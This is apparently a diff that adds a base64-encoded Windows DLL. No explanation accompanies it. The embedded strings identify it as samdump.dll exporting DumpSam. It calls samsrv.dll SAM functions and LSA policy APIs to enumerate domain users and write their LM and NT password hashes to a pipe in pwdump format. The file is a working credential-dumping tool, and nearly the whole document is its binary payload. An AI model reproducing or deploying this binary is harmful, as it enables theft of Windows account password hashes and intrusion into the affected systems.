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
+fQAQfgtWU+hA////WVnrCqFYdgAQigRYI8aFwHUEi8PrZYsVWHYAEIvDwfgID7bI9kRKAYB0D4Bl
+CgBqAohFCIhdCVjrCYBlCQCIXQiLxlZqAI1N/GoDUVCNRQhQV/81lIEAEOiV8v//g8QghcB0rjvG
+dQYPtkX86w0PtkX9D7ZN/MHgCAvBX15bycPMzMzMzMzMzMzMzMzMzMyLRCQIi0wkEAvIi0wkDHUJ
+i0QkBPfhwhAAU/fhi9iLRCQI92QkFAPYi0QkCPfhA9NbwhAAzMzMzMzMzMzMzMzMjUL/W8ONpCQA
+AAAAjWQkADPAikQkCFOL2MHgCItUJAj3wgMAAAB0E4oKQjjZdNGEyXRR98IDAAAAde0L2FeLw8Hj
+EFYL2IsKv//+/n6LwYv3M8sD8AP5g/H/g/D/M88zxoPCBIHhAAEBgXUcJQABAYF00yUAAQEBdQiB
+5gAAAIB1xF5fWzPAw4tC/DjYdDaEwHTvONx0J4TkdOfB6BA42HQVhMB03DjcdAaE5HTU65ZeX41C
+/1vDjUL+Xl9bw41C/V5fW8ONQvxeX1vD/yU4YAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAANmgAABpoAAAOaAAAAAAAAKxnAABqZwAAkGcAANxnAADyZwAAoGcAAHpnAAC6ZwAA
+yGcAAMppAABUaAAAYGgAAHJoAACAaAAAjmgAAKJoAAC2aAAAzGgAANpoAADmaAAA8GgAAABpAAAO
+aQAAIGkAADBpAAA+aQAAUGkAAGhpAAB+aQAAmGkAALJpAABYZwAA5GkAAPJpAAAAagAADmoAABpq
+AAAsagAARGoAAFxqAAB0agAAjGoAAKhqAAC0agAAwGoAAMpqAADWagAA5moAAPRqAAAEawAAGmsA
+ACprAAA6awAATGsAAAAAAAAAAAAA/////84SABDUEgAQBgAABgABAAAQAAMGAAYCEARFRUUFBQUF
+BTUwAFAAAAAAICg4UFgHCAA3MDBXUAcAACAgCAAAAAAIYGhgYGBgAABwcHh4eHgIBwgAAAcACAgI
+AAAIAAgABwgAAAAoAG4AdQBsAGwAKQAAAAAAKG51bGwpAABydW50aW1lIGVycm9yIAAADQoAAFRM
+T1NTIGVycm9yDQoAAABTSU5HIGVycm9yDQoAAAAARE9NQUlOIGVycm9yDQoAAFI2MDI4DQotIHVu
+YWJsZSB0byBpbml0aWFsaXplIGhlYXANCgAAAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZv
+ciBsb3dpbyBpbml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9y
+IHN0ZGlvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9u
+IGNhbGwNCgAAAFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRh
+YmxlDQoAAAAAUjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAx
+OA0KLSB1bmV4cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRp
+dGhyZWFkIGxvY2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJl
+YWQgZGF0YQ0KAA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5v
+dCBlbm91Z2ggc3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFj
+ZSBmb3IgYXJndW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoA
+AAAATWljcm9zb2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVy
+cm9yIQoKUHJvZ3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAEdldExhc3RBY3Rp
+dmVQb3B1cAAAR2V0QWN0aXZlV2luZG93AE1lc3NhZ2VCb3hBAHVzZXIzMi5kbGwAAAAAAAAAAAAA
+AAAAAP////8DUAAQB1AAEP////+3UAAQu1AAEP////87UgAQP1IAEEg6bW06c3MAZGRkZCwgTU1N
+TSBkZCwgeXl5eQBNL2QveXkAAFBNAABBTQAARGVjZW1iZXIAAAAATm92ZW1iZXIAAAAAT2N0b2Jl
+cgBTZXB0ZW1iZXIAAABBdWd1c3QAAEp1bHkAAAAASnVuZQAAAABBcHJpbAAAAE1hcmNoAAAARmVi
+cnVhcnkAAAAASmFudWFyeQBEZWMATm92AE9jdABTZXAAQXVnAEp1bABKdW4ATWF5AEFwcgBNYXIA
+RmViAEphbgBTYXR1cmRheQAAAABGcmlkYXkAAFRodXJzZGF5AAAAAFdlZG5lc2RheQAAAFR1ZXNk
+YXkATW9uZGF5AABTdW5kYXkAAFNhdABGcmkAVGh1AFdlZABUdWUATW9uAFN1bgBTdW5Nb25UdWVX
+ZWRUaHVGcmlTYXQAAABKYW5GZWJNYXJBcHJNYXlKdW5KdWxBdWdTZXBPY3ROb3ZEZWMAAAAAfGYA
+AAAAAAAAAAAAAGgAABBgAABsZgAAAAAAAAAAAABGaAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+NmgAABpoAAAOaAAAAAAAAKxnAABqZwAAkGcAANxnAADyZwAAoGcAAHpnAAC6ZwAAyGcAAMppAABU
+aAAAYGgAAHJoAACAaAAAjmgAAKJoAAC2aAAAzGgAANpoAADmaAAA8GgAAABpAAAOaQAAIGkAADBp
+AAA+aQAAUGkAAGhpAAB+aQAAmGkAALJpAABYZwAA5GkAAPJpAAAAagAADmoAABpqAAAsagAARGoA
+AFxqAAB0agAAjGoAAKhqAAC0agAAwGoAAMpqAADWagAA5moAAPRqAAAEawAAGmsAACprAAA6awAA
+TGsAAAAAAABTAUdldFByb2NBZGRyZXNzAADfAUxvYWRMaWJyYXJ5QQAAGAJPdXRwdXREZWJ1Z1N0
+cmluZ0EAAC0BR2V0TGFzdEVycm9yAAAOA1dyaXRlRmlsZQDDAEZyZWVMaWJyYXJ5AB4AQ2xvc2VI
+YW5kbGUAuQBGbHVzaEZpbGVCdWZmZXJzAAABA1dpZGVDaGFyVG9NdWx0aUJ5dGUANwBDcmVhdGVG
+aWxlQQBLRVJORUwzMi5kbGwAAB8BTHNhQ2xvc2UAAEEBTHNhUXVlcnlJbmZvcm1hdGlvblBvbGlj
+eQA7AUxzYU9wZW5Qb2xpY3kAQURWQVBJMzIuZGxsAABXAlJ0bFVud2luZADaAEdldENvbW1hbmRM
+aW5lQQCOAUdldFZlcnNpb24AAIwARXhpdFByb2Nlc3MAywJUZXJtaW5hdGVQcm9jZXNzAAAJAUdl
+dEN1cnJlbnRQcm9jZXNzAAwBR2V0Q3VycmVudFRocmVhZElkAADTAlRsc1NldFZhbHVlANACVGxz
+QWxsb2MAANECVGxzRnJlZQCcAlNldExhc3RFcnJvcgAA0gJUbHNHZXRWYWx1ZQCYAlNldEhhbmRs
+ZUNvdW50AABoAUdldFN0ZEhhbmRsZQAAKAFHZXRGaWxlVHlwZQBmAUdldFN0YXJ0dXBJbmZvQQBa
+AERlbGV0ZUNyaXRpY2FsU2VjdGlvbgA4AUdldE1vZHVsZUZpbGVOYW1lQQAAwQBGcmVlRW52aXJv
+bm1lbnRTdHJpbmdzQQDCAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NXABkBR2V0RW52aXJvbm1lbnRT
+dHJpbmdzABsBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAuAFIZWFwRGVzdHJveQC2AUhlYXBDcmVh
+dGUAAPECVmlydHVhbEZyZWUAugFIZWFwRnJlZQAAlQJTZXRGaWxlUG9pbnRlcgAAbwBFbnRlckNy
+aXRpY2FsU2VjdGlvbgAA3gFMZWF2ZUNyaXRpY2FsU2VjdGlvbgAAyAFJbnRlcmxvY2tlZERlY3Jl
+bWVudAAAywFJbnRlcmxvY2tlZEluY3JlbWVudAAAxQFJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9u
+ALQBSGVhcEFsbG9jAM8AR2V0Q1BJbmZvAMkAR2V0QUNQAABGAUdldE9FTUNQAADuAlZpcnR1YWxB
+bGxvYwAAvQFIZWFwUmVBbGxvYwCoAlNldFN0ZEhhbmRsZQAAAgJNdWx0aUJ5dGVUb1dpZGVDaGFy
+ANwBTENNYXBTdHJpbmdBAADdAUxDTWFwU3RyaW5nVwAAaQFHZXRTdHJpbmdUeXBlQQAAbAFHZXRT
+dHJpbmdUeXBlVwAAAAAAAAAAE/jgOAAAAACSawAAAQAAAAEAAAABAAAAiGsAAIxrAACQawAA8BIA
+AJ5rAAAAAHNhbWR1bXAuZGxsAER1bXBTYW0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAOYyABC4PQAQAAAAAAAAAACOMwAQAAAAAAAAAAAAAAAAAAAAAFNhbXJDbG9z
+ZUhhbmRsZQBTYW1JRnJlZV9TQU1QUl9FTlVNRVJBVElPTl9CVUZGRVIAAABTYW1JRnJlZV9TQU1Q
+Ul9VU0VSX0lORk9fQlVGRkVSAFNhbXJFbnVtZXJhdGVVc2Vyc0luRG9tYWluAABTYW1yUXVlcnlJ
+bmZvcm1hdGlvblVzZXIAAAAAU2Ftck9wZW5Vc2VyAAAAAFNhbXJPcGVuRG9tYWluAABTYW1JQ29u
+bmVjdABzYW1zcnYuZGxsAABXcml0ZUZpbGUgZmFpbGVkOiAlZApUZXh0OiAlcwAAACVzOiVkOiUw
+MnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAy
+eCUwMng6JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAy
+eCUwMnglMDJ4JTAyeDo6OgoAU2FtclF1ZXJ5SW5mb3JtYXRpb25Vc2VyIGZhaWxlZCA6IDB4JTA4
+WAoAAABTYW1yT3BlblVzZXIoMHgleCkgZmFpbGVkIDogMHglMDhYCgBTYW1yRW51bWVyYXRlVXNl
+cnNJbkRvbWFpbiBmYWlsZWQgOiAweCUwOFgKAFNhbU9wZW5Eb21haW4gZmFpbGVkIDogMHglMDhY
+CgAAU2FtQ29ubmVjdCBmYWlsZWQgOiAweCUwOFgAAExzYVF1ZXJ5SW5mb3JtYXRpb25Qb2xpY3kg
+ZmFpbGVkIDogMHglMDhYAAAATHNhT3BlblBvbGljeSBmYWlsZWQgOiAweCUwOFgAAABGYWlsZWQg
+dG8gbG9hZCBmdW5jdGlvbnMKAAAARmFpbGVkIHRvIG9wZW4gb3V0cHV0IHBpcGUoJXMpOiAlZAoA
+IAWTGQAAAAAAAAAAAAAAAKkkABBoYQAQWGEAEP////8AAAAA/////wAKAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAEAAAAAIAAADUYwAQCAAAAKhjABAJAAAAfGMAEAoAAABYYwAQEAAAACxj
+ABARAAAA/GIAEBIAAADYYgAQEwAAAKxiABAYAAAAdGIAEBkAAABMYgAQGgAAABRiABAbAAAA3GEA
+EBwAAAC0YQAQeAAAAKRhABB5AAAAlGEAEHoAAACEYQAQ/AAAAIBhABD/AAAAcGEAEGCFABAAAAAA
+YIUAEAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAEAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAACAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAABtTgAQbU4AEG1OABBtTgAQbU4AEG1OABBidgAQYnYAEAAAIAAgACAAIAAgACAAIAAgACAA
+KAAoACgAKAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQ
+ABAAEAAQABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEA
+gQCBAIEAgQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQ
+ABAAEACCAIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA
+EAAQABAAEAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ
+gQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECBABAAAAAAAAAAAAAAAABYgQAQAAAAAAAA
+AAAAAAAAKIEAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAUAAMALAAAAAAAAAB0AAMAEAAAAAAAAAJYAAMAEAAAAAAAAAI0AAMAI
+AAAAAAAAAI4AAMAIAAAAAAAAAI8AAMAIAAAAAAAAAJAAAMAIAAAAAAAAAJEAAMAIAAAAAAAAAJIA
+AMAIAAAAAAAAAJMAAMAIAAAAAAAAAAMAAAAHAAAAeAAAAAoAAAAAAAAAAAAAAAECBAgAAAAApAMA
+AGCCeYIhAAAAAAAAAKbfAAAAAAAAoaUAAAAAAACBn+D8AAAAAEB+gPwAAAAAqAMAAMGj2qMgAAAA
